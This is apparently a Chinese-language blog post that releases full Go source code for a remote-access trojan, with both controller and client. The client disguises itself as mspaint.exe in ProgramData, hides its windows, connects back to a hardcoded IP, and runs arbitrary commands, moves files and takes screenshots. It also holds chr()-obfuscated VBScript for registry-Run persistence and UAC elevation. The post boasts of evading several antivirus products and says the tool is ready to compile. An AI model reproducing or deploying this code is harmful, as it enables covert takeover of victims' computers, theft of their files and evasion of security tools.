0x01 工具介绍
由于工作需要,写了一款Golang远控软件,现在也用不上了,开源算了,支持很多功能,如 ”加密传输、截图回传、反向Socks5代理回内网、开机自启“。
当client.exe被点击后,小马会自动复制本身到 ”C:\ProgramData“ 隐藏目录并再次执行,自动删除当前桌面上的Clinet文件。
目前大多数远控软件都基于C++/C#编写的,杀软对这些开发语言很敏感,非常容易就被识别出来了,但使用Golang语言编写的就不一样了,改一改就能过360、火绒、金山、腾讯电脑管家、AVG、等等,如有需要添加其他功能,可以私我哦。。。Py
0x02 目前的功能
- 多用户上线,多用户管理
- 下载远程文件
- 上传本地文件到目标电脑
- 屏幕截图,回传
- 动态设置编码
- 执行系统任意指令
- 安装成服务,实现开机自启[x]
- 反向socks5[x]
- EXE文件捆绑[x]
0x05 过杀软情况
火绒查杀
image.png
微步在线恶意文件检测
image.png
VirSCAN.org-多引擎在线病毒扫描
image.png
0x03 服务端代码 server.go
package main
import (
"bufio"
"encoding/base64"
"flag"
"fmt"
"io"
"io/ioutil"
"log"
"net"
"os"
"os/exec"
"path/filepath"
"strconv"
"strings"
"sync"
"time"
)
const (
WHITE = "\x1b[37;1m"
RED = "\x1b[31;1m"
GREEN = "\x1b[32;1m"
YELLOW = "\x1b[33;1m"
BLUE = "\x1b[34;1m"
MAGENTA = "\x1b[35;1m"
CYAN = "\x1b[36;1m"
VERSION = "2.5.0"
)
var (
inputIP = flag.String("IP", "0.0.0.0", "Listen IP")
inputPort = flag.String("PORT", "53", "Listen Port")
connPwd = flag.String("PWD", "18Sd9fkdkf9", "Connection Password")
counter int //用于会话计数,给map的key使用
connlist map[int]net.Conn = make(map[int]net.Conn) //存储所有连接的会话
connlistIPAddr map[int]string = make(map[int]string) //存储所有IP地址,提供输入标识符显示
lock = &sync.Mutex{}
downloadOutName string
)
func getDateTime() string {
currentTime := time.Now()
// https://golang.org/pkg/time/#example_Time_Format
return currentTime.Format("2006-01-02-15-04-05")
}
// ReadLine 函数等待命令行输入,返回字符串
func ReadLine() string {
buf := bufio.NewReader(os.Stdin)
lin, _, err := buf.ReadLine()
if err != nil {
fmt.Println(RED, "[!] Error to Read Line!")
}
return string(lin)
}
// Socket客户端连接处理程序,专用于接收消息处理
func connection(conn net.Conn) {
defer conn.Close()
var myid int
myip := conn.RemoteAddr().String()
lock.Lock()
counter++
myid = counter
connlist[counter] = conn
connlistIPAddr[counter] = myip
lock.Unlock()
fmt.Printf("--- client: %s connection ---\n", myip)
for {
message, err := bufio.NewReader(conn).ReadString('\n')
//如果客户端断开
if err == io.EOF {
conn.Close()
delete(connlist, myid)
delete(connlistIPAddr, myid)
break
}
decoded, _ := base64.StdEncoding.DecodeString(message)
decMessage := string(decoded)
switch decMessage {
case "download":
//fmt.Println("---收到download指令,等待下一次数据上传---")
// 等待用户上传数据
encData, _ := bufio.NewReader(conn).ReadString('\n')
fmt.Println(YELLOW, "-> Downloading...")
decData, _ := base64.URLEncoding.DecodeString(encData)
downFilePath, _ := filepath.Abs(string(downloadOutName) + getDateTime())
ioutil.WriteFile(downFilePath, []byte(decData), 777)
fmt.Println(GREEN, "-> Download Done...")
case "screenshot":
encData, _ := bufio.NewReader(conn).ReadString('\n')
fmt.Println(YELLOW, "-> Getting ScreenShot...")
decData, _ := base64.URLEncoding.DecodeString(encData)
//filename := myip + getDateTime()+".png"
absFilePath, _ := filepath.Abs(strings.Replace(myip, ":", "_", -1) + getDateTime() + ".png")
ioutil.WriteFile(absFilePath, []byte(decData), 777)
fmt.Printf(GREEN+"-> ScreenShot Done, filename: %s\n", absFilePath)
default:
fmt.Println("\n" + decMessage)
}
}
fmt.Printf("--- %s close---\n", myip)
}
// 等待Socket 客户端连接
func handleConnWait() {
l, err := net.Listen("tcp", *inputIP+":"+*inputPort)
if err != nil {
log.Fatal(err)
}
defer l.Close()
for {
conn, err := l.Accept()
if err != nil {
log.Fatal(err)
}
message, err := bufio.NewReader(conn).ReadString('\n')
decoded, _ := base64.StdEncoding.DecodeString(message)
if string(decoded) == *connPwd {
go connection(conn)
} else {
backMsg := base64.URLEncoding.EncodeToString([]byte("back"))
conn.Write([]byte(backMsg + "\n"))
conn.Close()
}
}
}
func main() {
flag.Parse()
go handleConnWait()
connid := 0
for {
fmt.Print(RED, "SESSION ", connlistIPAddr[connid], WHITE, "> ")
command := ReadLine()
_conn, ok := connlist[connid]
switch command {
case "":
// 如果输入为空,则什么都不做
case "help":
fmt.Println("")
fmt.Println(CYAN, "COMMANDS DESCRIPTION")
fmt.Println(CYAN, "-------------------------------------------------------")
fmt.Println(CYAN, "session 选择在线的客户端")
fmt.Println(CYAN, "download 下载远程文件")
fmt.Println(CYAN, "upload 上传本地文件")
fmt.Println(CYAN, "screenshot 远程桌面截图")
fmt.Println(CYAN, "charset gbk 设置客户端命令行输出编码,gbk是简体中文")
fmt.Println(CYAN, "clear 清楚屏幕")
fmt.Println(CYAN, "exit 客户端下线")
fmt.Println(CYAN, "quit 退出服务器端")
fmt.Println(CYAN, "startup 加入启动项目文件夹")
fmt.Println(CYAN, "-------------------------------------------------------")
fmt.Println("")
case "session":
fmt.Println(connlist)
fmt.Print("选择客户端ID: ")
inputid := ReadLine()
if inputid != "" {
var e error
connid, e = strconv.Atoi(inputid)
if e != nil {
fmt.Println("请输入数字")
} else if _, ok := connlist[connid]; ok {
//如果输入并且存在客户端id
_cmd := base64.URLEncoding.EncodeToString([]byte("getos"))
connlist[connid].Write([]byte(_cmd + "\n"))
}
}
case "clear":
ClearScreen()
case "exit":
if ok {
encDownload := base64.URLEncoding.EncodeToString([]byte("exit"))
_conn.Write([]byte(encDownload + "\n"))
}
case "quit":
os.Exit(0)
case "download":
if ok {
// 第一步,发送下载指令
encDownload := base64.URLEncoding.EncodeToString([]byte("download"))
_conn.Write([]byte(encDownload + "\n"))
// 第二步,输入下载路径和要保存的文件名,发送给客户端
fmt.Print("File Path to Download: ")
nameDownload := ReadLine()
fmt.Print("Output name: ")
downloadOutName = ReadLine()
// 下发需要download的文件名路径, conn连接的协程里面接收
encName := base64.URLEncoding.EncodeToString([]byte(nameDownload))
_conn.Write([]byte(encName + "\n"))
fmt.Print(encName)
}
case "screenshot":
if ok {
encScreenShot := base64.URLEncoding.EncodeToString([]byte("screenshot"))
_conn.Write([]byte(encScreenShot + "\n"))
}
case "upload":
if ok {
encUpload := base64.URLEncoding.EncodeToString([]byte("upload"))
_conn.Write([]byte(encUpload + "\n"))
fmt.Print("File Path to Upload: ")
pathUpload := ReadLine()
fmt.Print("Output name: ")
outputName := ReadLine()
encOutput := base64.URLEncoding.EncodeToString([]byte(outputName))
_conn.Write([]byte(encOutput + getDateTime() + "\n"))
fmt.Println(YELLOW, "-> Uploading...")
//上传文件
file, err := ioutil.ReadFile(pathUpload)
if err != nil {
fmt.Println(RED, "[!] File not found!")
break
}
encData := base64.URLEncoding.EncodeToString(file)
_conn.Write([]byte(string(encData) + "\n"))
fmt.Println(GREEN, "-> Upload Done...")
}
default:
if ok {
_cmd := base64.URLEncoding.EncodeToString([]byte(command))
_conn.Write([]byte(_cmd + "\n"))
}
}
}
}
// ClearScreen 清除屏幕
func ClearScreen() {
cmd := exec.Command("clear")
cmd.Stdout = os.Stdout
cmd.Run()
}
0x04 客户端代码 client.go
客户端编译前,需要更改上线IP、连接密码CONNPWD这两个参数,因为只有与服务端的连接密码相同时,才会建立连接,保证了建立Socket时不会出现上线误报问题。
package main
import (
"bufio"
"bytes"
"context"
"encoding/base64"
"fmt"
"image/png"
"io"
"io/ioutil"
"log"
"net"
"os"
"os/exec"
"path/filepath"
"runtime"
"strings"
"syscall"
"time"
"github.com/axgle/mahonia"
screenshot "github.com/kbinani/screenshot"
)
const (
IP = "192.168.1.209:53"
CONNPWD = "18Sd9fkdkf9"
)
var (
// cmd执行超时的秒数
Timeout = 30 * time.Second
// cmd 输出字符串编码
charset = "utf-8"
)
func main() {
if runtime.GOOS == "windows" {
targetPath := os.Getenv("systemdrive") + "\\ProgramData\\"
targetFile := targetPath + "mspaint.exe"
os.Mkdir(targetPath, os.ModePerm)
//exec.Command("")
//获取当前文件执行的绝对路径
currentFile, _ := exec.LookPath(os.Args[0])
currentFileAbs, _ := filepath.Abs(currentFile)
// 如果当前执行都文件是复制后的目标文件,
if currentFileAbs == targetFile {
// 删除原有文件
fmt.Println(len(os.Args))
if len(os.Args) > 1 {
err := os.Chmod(os.Args[1], 0777)
if err != nil {
fmt.Println(err)
}
//err = os.Remove(os.Args[1])
//if err != nil {
fmt.Println(err)
//}
}
//开始连接
for {
connect()
}
} else {
//设定一个目标文件信息
_, err := os.Stat(targetFile)
if err != nil {
// 打开源文件
srcFile, _ := os.Open(currentFile)
//创建目标文件
desFile, err := os.Create(targetFile)
if err != nil {
fmt.Println(err)
}
//copy源文件的内容到目标文件
_, err = io.Copy(desFile, srcFile)
if err != nil {
fmt.Println(err)
}
//设定目标文件权限 0777, 这样才可以启动
err = os.Chmod(targetFile, 0777)
if err != nil {
fmt.Println(err)
}
//不能使用 defer desFile.Close(), 需要在执行前关闭文件句柄
srcFile.Close()
desFile.Close()
// start 启动目标程序,进程不需要等待交互
mCommand(targetFile, currentFileAbs)
// 打开图片
//mCommand("cmd.exe", "/c", "start", "max.jpg")
//install_start() //自七
} else {
// 如果文件已经存在,start 启动目标程序,进程不需要等待交互
mCommand(targetFile, currentFileAbs)
// 打开图片
//mCommand("cmd.exe", "/c", "start", "max.jpg")
//install_start() //自七
}
}
} else {
for {
connect()
}
}
}
func install_start() { //windows提升权限,加注册表,
err := ioutil.WriteFile("test.vbs", []byte("execute(chr(83)&chr(101)&chr(116)&chr(32)&chr(85)&chr(65)&chr(67)&chr(32)&chr(61)&chr(32)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(46)&chr(65)&chr(112)&chr(112)&chr(108)&chr(105)&chr(99)&chr(97)&chr(116)&chr(105)&chr(111)&chr(110)&chr(34)&chr(41)&chr(32)&chr(32)&chr(10)&chr(83)&chr(101)&chr(116)&chr(32)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(32)&chr(61)&chr(32)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(34)&chr(41)&chr(32)&chr(32)&chr(10)&chr(73)&chr(102)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(65)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(46)&chr(99)&chr(111)&chr(117)&chr(110)&chr(116)&chr(60)&chr(49)&chr(32)&chr(84)&chr(104)&chr(101)&chr(110)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(101)&chr(99)&chr(104)&chr(111)&chr(32)&chr(34)&chr(35821)&chr(27861)&chr(58)&chr(32)&chr(32)&chr(115)&chr(117)&chr(100)&chr(111)&chr(32)&chr(60)&chr(99)&chr(111)&chr(109)&chr(109)&chr(97)&chr(110)&chr(100)&chr(62)&chr(32)&chr(91)&chr(97)&chr(114)&chr(103)&chr(115)&chr(93)&chr(34)&chr(32)&chr(32)&chr(10)&chr(69)&chr(108)&chr(115)&chr(101)&chr(73)&chr(102)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(65)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(46)&chr(99)&chr(111)&chr(117)&chr(110)&chr(116)&chr(61)&chr(49)&chr(32)&chr(84)&chr(104)&chr(101)&chr(110)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(85)&chr(65)&chr(67)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(69)&chr(120)&chr(101)&chr(99)&chr(117)&chr(116)&chr(101)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(97)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(40)&chr(48)&chr(41)&chr(44)&chr(32)&chr(34)&chr(34)&chr(44)&chr(32)&chr(34)&chr(34)&chr(44)&chr(32)&chr(34)&chr(114)&chr(117)&chr(110)&chr(97)&chr(115)&chr(34)&chr(44)&chr(32)&chr(49)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(83)&chr(108)&chr(101)&chr(101)&chr(112)&chr(32)&chr(49)&chr(53)&chr(48)&chr(48)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(68)&chr(105)&chr(109)&chr(32)&chr(114)&chr(101)&chr(116)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(114)&chr(101)&chr(116)&chr(32)&chr(61)&chr(32)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(46)&chr(65)&chr(112)&chr(112)&chr(97)&chr(99)&chr(116)&chr(105)&chr(118)&chr(97)&chr(116)&chr(101)&chr(40)&chr(34)&chr(29992)&chr(25143)&chr(36134)&chr(25143)&chr(25511)&chr(21046)&chr(34)&chr(41)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(73)&chr(102)&chr(32)&chr(114)&chr(101)&chr(116)&chr(32)&chr(61)&chr(32)&chr(116)&chr(114)&chr(117)&chr(101)&chr(32)&chr(84)&chr(104)&chr(101)&chr(110)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(46)&chr(115)&chr(101)&chr(110)&chr(100)&chr(107)&chr(101)&chr(121)&chr(115)&chr(32)&chr(34)&chr(37)&chr(121)&chr(34)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(69)&chr(108)&chr(115)&chr(101)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(101)&chr(99)&chr(104)&chr(111)&chr(32)&chr(34)&chr(33258)&chr(21160)&chr(33719)&chr(21462)&chr(31649)&chr(29702)&chr(21592)&chr(26435)&chr(38480)&chr(22833)&chr(36133)&chr(65292)&chr(35831)&chr(25163)&chr(21160)&chr(30830)&chr(35748)&chr(12290)&chr(34)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(69)&chr(110)&chr(100)&chr(32)&chr(73)&chr(102)&chr(32)&chr(32)&chr(10)&chr(69)&chr(108)&chr(115)&chr(101)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(68)&chr(105)&chr(109)&chr(32)&chr(117)&chr(99)&chr(67)&chr(111)&chr(117)&chr(110)&chr(116)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(68)&chr(105)&chr(109)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(32)&chr(61)&chr(32)&chr(78)&chr(85)&chr(76)&chr(76)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(70)&chr(111)&chr(114)&chr(32)&chr(117)&chr(99)&chr(67)&chr(111)&chr(117)&chr(110)&chr(116)&chr(61)&chr(49)&chr(32)&chr(84)&chr(111)&chr(32)&chr(40)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(65)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(46)&chr(99)&chr(111)&chr(117)&chr(110)&chr(116)&chr(45)&chr(49)&chr(41)&chr(32)&chr(83)&chr(116)&chr(101)&chr(112)&chr(32)&chr(49)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(32)&chr(61)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(32)&chr(38)&chr(32)&chr(34)&chr(32)&chr(34)&chr(32)&chr(38)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(65)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(40)&chr(117)&chr(99)&chr(67)&chr(111)&chr(117)&chr(110)&chr(116)&chr(41)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(78)&chr(101)&chr(120)&chr(116)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(85)&chr(65)&chr(67)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(69)&chr(120)&chr(101)&chr(99)&chr(117)&chr(116)&chr(101)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(97)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(40)&chr(48)&chr(41)&chr(44)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(44)&chr(32)&chr(34)&chr(34)&chr(44)&chr(32)&chr(34)&chr(114)&chr(117)&chr(110)&chr(97)&chr(115)&chr(34)&chr(44)&chr(32)&chr(53)&chr(32)&chr(32)&chr(10)&chr(69)&chr(110)&chr(100)&chr(32)&chr(73)&chr(102)&chr(32)&chr(32))"), 0666)
if err != nil {
log.Fatal(err)
}
err2 := ioutil.WriteFile("add.vbs", []byte("execute(chr(83)&chr(101)&chr(116)&chr(32)&chr(111)&chr(98)&chr(106)&chr(87)&chr(115)&chr(104)&chr(32)&chr(61)&chr(32)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(34)&chr(41)&chr(10)&chr(111)&chr(98)&chr(106)&chr(87)&chr(115)&chr(104)&chr(46)&chr(82)&chr(117)&chr(110)&chr(32)&chr(34)&chr(114)&chr(101)&chr(103)&chr(32)&chr(97)&chr(100)&chr(100)&chr(32)&chr(72)&chr(75)&chr(69)&chr(89)&chr(95)&chr(76)&chr(79)&chr(67)&chr(65)&chr(76)&chr(95)&chr(77)&chr(65)&chr(67)&chr(72)&chr(73)&chr(78)&chr(69)&chr(92)&chr(83)&chr(79)&chr(70)&chr(84)&chr(87)&chr(65)&chr(82)&chr(69)&chr(92)&chr(77)&chr(105)&chr(99)&chr(114)&chr(111)&chr(115)&chr(111)&chr(102)&chr(116)&chr(92)&chr(87)&chr(105)&chr(110)&chr(100)&chr(111)&chr(119)&chr(115)&chr(92)&chr(67)&chr(117)&chr(114)&chr(114)&chr(101)&chr(110)&chr(116)&chr(86)&chr(101)&chr(114)&chr(115)&chr(105)&chr(111)&chr(110)&chr(92)&chr(82)&chr(117)&chr(110)&chr(32)&chr(47)&chr(118)&chr(32)&chr(65)&chr(85)&chr(84)&chr(79)&chr(82)&chr(85)&chr(78)&chr(32)&chr(47)&chr(116)&chr(32)&chr(82)&chr(69)&chr(71)&chr(95)&chr(83)&chr(90)&chr(32)&chr(47)&chr(100)&chr(32)&chr(67)&chr(58)&chr(92)&chr(80)&chr(114)&chr(111)&chr(103)&chr(114)&chr(97)&chr(109)&chr(68)&chr(97)&chr(116)&chr(97)&chr(92)&chr(109)&chr(115)&chr(112)&chr(97)&chr(105)&chr(110)&chr(116)&chr(46)&chr(101)&chr(120)&chr(101)&chr(32)&chr(47)&chr(102)&chr(34)&chr(44)&chr(118)&chr(98)&chr(104)&chr(105)&chr(100)&chr(101)&chr(10)&chr(111)&chr(98)&chr(106)&chr(87)&chr(115)&chr(104)&chr(46)&chr(82)&chr(117)&chr(110)&chr(32)&chr(34)&chr(116)&chr(101)&chr(115)&chr(116)&chr(46)&chr(118)&chr(98)&chr(115)&chr(32)&chr(114)&chr(101)&chr(103)&chr(32)&chr(97)&chr(100)&chr(100)&chr(32)&chr(72)&chr(75)&chr(69)&chr(89)&chr(95)&chr(76)&chr(79)&chr(67)&chr(65)&chr(76)&chr(95)&chr(77)&chr(65)&chr(67)&chr(72)&chr(73)&chr(78)&chr(69)&chr(92)&chr(83)&chr(79)&chr(70)&chr(84)&chr(87)&chr(65)&chr(82)&chr(69)&chr(92)&chr(77)&chr(105)&chr(99)&chr(114)&chr(111)&chr(115)&chr(111)&chr(102)&chr(116)&chr(92)&chr(87)&chr(105)&chr(110)&chr(100)&chr(111)&chr(119)&chr(115)&chr(92)&chr(67)&chr(117)&chr(114)&chr(114)&chr(101)&chr(110)&chr(116)&chr(86)&chr(101)&chr(114)&chr(115)&chr(105)&chr(111)&chr(110)&chr(92)&chr(82)&chr(117)&chr(110)&chr(32)&chr(47)&chr(118)&chr(32)&chr(65)&chr(85)&chr(84)&chr(79)&chr(82)&chr(85)&chr(78)&chr(32)&chr(47)&chr(116)&chr(32)&chr(82)&chr(69)&chr(71)&chr(95)&chr(83)&chr(90)&chr(32)&chr(47)&chr(100)&chr(32)&chr(67)&chr(58)&chr(92)&chr(80)&chr(114)&chr(111)&chr(103)&chr(114)&chr(97)&chr(109)&chr(68)&chr(97)&chr(116)&chr(97)&chr(92)&chr(109)&chr(115)&chr(112)&chr(97)&chr(105)&chr(110)&chr(116)&chr(46)&chr(101)&chr(120)&chr(101)&chr(32)&chr(47)&chr(102)&chr(34)&chr(44)&chr(118)&chr(98)&chr(104)&chr(105)&chr(100)&chr(101))"), 0666)
if err2 != nil {
log.Fatal(err)
}
c := exec.Command("cmd", "/c", "add.vbs")
c.Run()
er := os.Remove("add.vbs")
if err != nil {
log.Fatal(er)
}
}
// 获取不同操作系统的环境的截图临时文件的位置
func getScreenshotFilename() string {
var (
filepath string
)
if runtime.GOOS == "windows" {
filepath = os.Getenv("systemdrive") + "\\ProgramData\\tmp.png"
} else {
filepath = "/tmp/.tmp.png"
}
return filepath
}
// 转化字符串
func ConvertToString(src string, srcCode string, tagCode string) string {
srcCoder := mahonia.NewDecoder(srcCode)
srcResult := srcCoder.ConvertString(src)
tagCoder := mahonia.NewDecoder(tagCode)
_, cdata, _ := tagCoder.Translate([]byte(srcResult), true)
result := string(cdata)
return result
}
// TakeScreenShot 截图功能,并存储到本地
func TakeScreenShot() {
n := screenshot.NumActiveDisplays()
fpath := getScreenshotFilename()
for i := 0; i < n; i++ {
bounds := screenshot.GetDisplayBounds(i)
img, err := screenshot.CaptureRect(bounds)
if err != nil {
connect()
}
file, _ := os.Create(fpath)
defer file.Close()
png.Encode(file, img)
}
}
// 连接远程服务器
func connect() {
conn, err := net.Dial("tcp", IP)
if err != nil {
fmt.Println("Connection...")
for {
connect()
}
}
errMsg := base64.URLEncoding.EncodeToString([]byte(CONNPWD))
conn.Write([]byte(string(errMsg) + "\n"))
fmt.Println("Connection success...")
for {
//等待接收指令,以 \n 为结束符,所有指令字符都经过base64
message, err := bufio.NewReader(conn).ReadString('\n')
if err == io.EOF {
// 如果服务器断开,则重新连接
conn.Close()
connect()
}
// 收到指令base64解码
decodedCase, _ := base64.StdEncoding.DecodeString(message)
command := string(decodedCase)
cmdParameter := strings.Split(command, " ")
switch cmdParameter[0] {
case "back":
conn.Close()
connect()
case "exit":
conn.Close()
os.Exit(0)
case "charset":
if len(cmdParameter) == 2 {
charset = cmdParameter[1]
}
case "upload":
uploadOutput, _ := bufio.NewReader(conn).ReadString('\n')
decodeOutput, _ := base64.StdEncoding.DecodeString(uploadOutput)
encData, _ := bufio.NewReader(conn).ReadString('\n')
decData, _ := base64.URLEncoding.DecodeString(encData)
ioutil.WriteFile(string(decodeOutput), []byte(decData), 777)
case "download":
// 第一步收到下载指令,什么都不做,继续等待下载路径
download, _ := bufio.NewReader(conn).ReadString('\n')
decodeDownload, _ := base64.StdEncoding.DecodeString(download)
file, err := ioutil.ReadFile(string(decodeDownload))
if err != nil {
// 找不到文件,发送错误消息
errMsg := base64.URLEncoding.EncodeToString([]byte("[!] File not found!"))
conn.Write([]byte(string(errMsg) + "\n"))
break
}
//发送一个download指令给服务器端准备接收
srvDownloadMsg := base64.URLEncoding.EncodeToString([]byte("download"))
conn.Write([]byte(string(srvDownloadMsg) + "\n"))
//读文件上传
encData := base64.URLEncoding.EncodeToString(file)
conn.Write([]byte(string(encData) + "\n"))
case "screenshot":
TakeScreenShot()
file, err := ioutil.ReadFile(getScreenshotFilename())
if err != nil {
// 找不到文件,发送错误消息
errMsg := base64.URLEncoding.EncodeToString([]byte("[!] File not found!"))
conn.Write([]byte(string(errMsg) + "\n"))
break
}
//发送一个download指令给服务器端准备接收
srvDownloadMsg := base64.URLEncoding.EncodeToString([]byte("screenshot"))
conn.Write([]byte(string(srvDownloadMsg) + "\n"))
//读图片文件上传
encData := base64.URLEncoding.EncodeToString(file)
conn.Write([]byte(string(encData) + "\n"))
case "getos":
if runtime.GOOS == "windows" {
command = "wmic os get name"
} else {
command = "uname -a"
}
fallthrough
default:
cmdArray := strings.Split(command, " ")
cmdSlice := cmdArray[1:len(cmdArray)]
out, outerr := mCommandTimeOut(cmdArray[0], cmdSlice...)
if outerr != nil {
out = []byte(outerr.Error())
}
// 解决命令行输出编码问题
if charset != "utf-8" {
out = []byte(ConvertToString(string(out), charset, "utf-8"))
}
encoded := base64.StdEncoding.EncodeToString(out)
conn.Write([]byte(encoded + "\n"))
}
}
}
func mCommandTimeOut(name string, arg ...string) ([]byte, error) {
ctxt, cancel := context.WithTimeout(context.Background(), Timeout)
defer cancel()
// 通过上下文执行,设置超时
cmd := exec.CommandContext(ctxt, name, arg...)
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
//cmd.SysProcAttr = &syscall.SysProcAttr{}
var buf bytes.Buffer
cmd.Stdout = &buf
cmd.Stderr = &buf
if err := cmd.Start(); err != nil {
return buf.Bytes(), err
}
if err := cmd.Wait(); err != nil {
return buf.Bytes(), err
}
return buf.Bytes(), nil
}
func mCommand(name string, arg ...string) {
cmd := exec.Command(name, arg...)
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
err := cmd.Start()
if err != nil {
fmt.Println(err)
}
}
0x05 关于使用
修改好,其中的一些连接参数,密码,端口,编译成EXE即可,Golang支持跨平台,也可以编译成Linux版本,进行远程控制。
未经许可禁止转载
有疑问加站长微信联系(非本文作者)